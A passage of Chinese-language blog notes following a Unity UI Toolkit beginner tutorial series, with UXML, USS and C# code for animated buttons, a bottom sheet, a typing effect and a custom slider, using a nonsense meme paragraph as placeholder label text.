    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&#10;&#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 24px; margin-left: 20px; margin-right: 20px; margin-top: 20px; margin-bottom: 20px; padding-left: 60px; padding-right: 60px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    ​USS 文件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgba(255, 255, 255, 255);
    background-color: rgba(0, 102, 255, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    Unity UI Toolkit Beginner’s Guide 2: Animating Interaction

    png

    ​UI Toolkit 支持 RelativeAbsolute

    png

    ​对于 Flex,当容器大小不够时,会 shrink

    png

    ​构造一个这样的 UI,通过给元素添加类实现显示之间的切换。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" style="flex-grow: 1; background-color: rgba(0, 0, 0, 0.75);" />
    <ui:VisualElement style="bottom: 0; height: 50%; width: 100%; position: absolute; border-top-left-radius: 40px; border-bottom-left-radius: 0; border-top-right-radius: 40px; border-bottom-right-radius: 0; background-color: rgb(255, 255, 255); align-items: center; padding-left: 50px; padding-right: 50px; padding-top: 50px; padding-bottom: 50px;">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement style="background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&amp;guid=c9c505e591b63904a901936e91e0ae2a&amp;type=3#Hyperspace - Projector&apos;); width: 438px; height: 400px;" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" class="textparagraph" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    .text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
    }

    .textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
    }

    ​Javascript 有 Jquery,Unity 有 UQuery!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class UIController : MonoBehaviour
    {
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;
    // Start is called before the first frame update
    void Start()
    {
    var root = GetComponent<UIDocument>().rootVisualElement;
    _bottomContainer = root.Q<VisualElement>("Container_Bottom");
    _openButton = root.Q<Button>("Button_Open");
    _closeButton = root.Q<Button>("Button_Close");

    _bottomSheet = root.Q<VisualElement>("BottomSheet");
    _scrim = root.Q<VisualElement>("Scrim");

    _bottomContainer.style.display = DisplayStyle.None;

    _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
    _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.Flex;

    _bottomSheet.AddToClassList("bottomsheet--up");
    _scrim.AddToClassList("scrim--fadein");
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.None;

    _bottomSheet.RemoveFromClassList("bottomsheet--up");
    _scrim.RemoveFromClassList("scrim--fadein");
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    png

    UIDocument 里绑定好 UIController.cs。开跑!这会遗留出一个问题——关闭菜单时不显示动画。

    Unity UI Toolkit Beginner’s Guide 3: Scripting Animation

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" class="image--boy image--boy--inair" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" class="scrim" />
    <ui:VisualElement name="BottomSheet" class="bottomsheet">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement name="image_Girl" class="image--girl image--girl--up" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" name="Message" class="textparagraph" style="margin-top: 80px;" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    .text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
    }

    .textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
    }

    .bottomsheet {
    width: 100%;
    height: 50%;
    position: relative;
    background-color: rgba(255, 255, 255, 255);
    align-items: center;
    padding-left: 40px;
    padding-right: 40px;
    padding-top: 40px;
    padding-bottom: 40px;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-bounce;
    translate: 0 100%;
    }

    .bottomsheet--up {
    translate: 0 0;
    }

    .scrim {
    height: 50%;
    background-color: rgba(0, 0, 0, 0.5);
    transition-property: opacity;
    transition-duration: 0.5s;
    opacity: 0;
    }

    .scrim--fadein {
    opacity: 1;
    }

    .image--boy {
    background-color: rgba(255, 255, 255, 0);
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&guid=6a43c56327b2ded46a942d159deac62a&type=3#Hyperspace - Floating');
    height: 600px;
    width: 300px;
    transition-property: translate;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-out-sine;
    translate: 0 0;
    }

    .image--boy--inair {
    translate: -500px -400px;
    }

    .image--girl {
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&guid=c9c505e591b63904a901936e91e0ae2a&type=3#Hyperspace - Projector');
    width: 438px;
    height: 400px;
    translate: 0 60px;
    transition-property: translate;
    transition-timing-function: ease-out-sine;
    transition-duration: 0.5s;
    }

    .image--girl--up {
    translate: 0 0;
    }
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;
    using DG.Tweening;

    public class UIController : MonoBehaviour
    {
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;
    private VisualElement _boy;
    private VisualElement _girl;
    private Label _message;
    // Start is called before the first frame update
    void Start()
    {
    var root = GetComponent<UIDocument>().rootVisualElement;
    _bottomContainer = root.Q<VisualElement>("Container_Bottom");
    _openButton = root.Q<Button>("Button_Open");
    _closeButton = root.Q<Button>("Button_Close");

    _bottomSheet = root.Q<VisualElement>("BottomSheet");
    _scrim = root.Q<VisualElement>("Scrim");

    _boy = root.Q<VisualElement>("image_Boy");
    _girl = root.Q<VisualElement>("image_Girl");

    _message = root.Q<Label>("Message");

    _bottomContainer.style.display = DisplayStyle.None;

    _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
    _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);

    Invoke("AnimateBoy", 1f);

    _bottomSheet.RegisterCallback<TransitionEndEvent>(OnBottomSheetDown);
    }

    private void AnimateBoy()
    {
    _boy.RemoveFromClassList("image--boy--inair");
    }

    private void AnimateGirl()
    {
    _girl.ToggleInClassList("image--girl--up");
    _girl.RegisterCallback<TransitionEndEvent>(
    evt => _girl.ToggleInClassList("image--girl--up")
    );

    _message.text = string.Empty;
    string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
    DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.Flex;

    _bottomSheet.AddToClassList("bottomsheet--up");
    _scrim.AddToClassList("scrim--fadein");

    AnimateGirl();
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
    _bottomSheet.RemoveFromClassList("bottomsheet--up");
    _scrim.RemoveFromClassList("scrim--fadein");
    }

    private void OnBottomSheetDown(TransitionEndEvent evt)
    {
    if (!_bottomSheet.ClassListContains("bottomsheet--up"))
    {
    _bottomContainer.style.display = DisplayStyle.None;
    }
    }

    // Update is called once per frame
    void Update()
    {
    Debug.Log(_girl.ClassListContains("image--girl--down"));
    }
    }

    ​核心是:

    1
    Invoke("AnimateBoy", 1f);

    ​延迟调用 AnimateBoy 以正确加载动画。

    1
    2
    3
    4
    _girl.ToggleInClassList("image--girl--up");
    _girl.RegisterCallback<TransitionEndEvent>(
    evt => _girl.ToggleInClassList("image--girl--up")
    );

    ​实现循环动画。

    1
    2
    3
    _message.text = string.Empty;
    string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
    DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);

    ​借助 Dotween 插件实现打字动画。

    Unity UI Toolkit Beginner’s Guide 4: Customizing Slider 1

    png

    ​整一个滑块的纹理。

    png

    ​创建一个 Slider,Background 设为滑块的 Sprite,打开 Sprite Editor 调整纹理的 Border

    png

    ​这个滑块下面不让改,只能用 USS 的类选择器修改样式。

    1
    2
    3
    4
    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;" />
    </ui:UXML>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    #MySlider Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    background-color: rgb(222, 255, 184);
    display: none;
    }

    #MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
    }

    #MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    }

    #MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    }

    .bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
    }

    .newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgba(0, 140, 255, 255);
    }

    ​这个 .bar 下面的 align-self: flex-end 在我这个版本的 Unity 里还没有,笑死,直接修改 USS 文件居然还能跑。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class CustomSlider : MonoBehaviour
    {
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;
    // Start is called before the first frame update
    void Start()
    {
    m_Root = GetComponent<UIDocument>().rootVisualElement;
    m_Slider = m_Root.Q<Slider>("MySlider");
    m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

    AddElements();

    m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

    m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);
    }

    void AddElements()
    {
    m_Bar = new VisualElement();
    m_Dragger.Add(m_Bar);
    m_Bar.name = "Bar";
    m_Bar.AddToClassList("bar");

    m_NewDragger = new VisualElement();
    m_Slider.Add(m_NewDragger);
    m_NewDragger.name = "NewDragger";
    m_NewDragger.AddToClassList("newdragger");
    m_NewDragger.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> evt)
    {
    Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
    Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    ​这个博主在结尾说了句如果用 UGUI 他之多需要 5 分钟就做完了,笑死,不好用。

    Unity UI Toolkit Beginner’s Guide 5: Customizing Slider 2

    1
    2
    3
    4
    5
    6
    7
    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; translate: 0 200px;" />
    <ui:VisualElement class="bubble" style="display: none; left: 0;">
    <ui:Label text="24" display-tooltip-when-elided="true" class="bubble_label" style="display: flex;" />
    </ui:VisualElement>
    </ui:UXML>
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    #MySlider > Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    display: none;
    }

    #MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
    border-top-left-radius: 10px;
    border-bottom-left-radius: 10px;
    border-top-right-radius: 10px;
    border-bottom-right-radius: 10px;
    }

    #MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
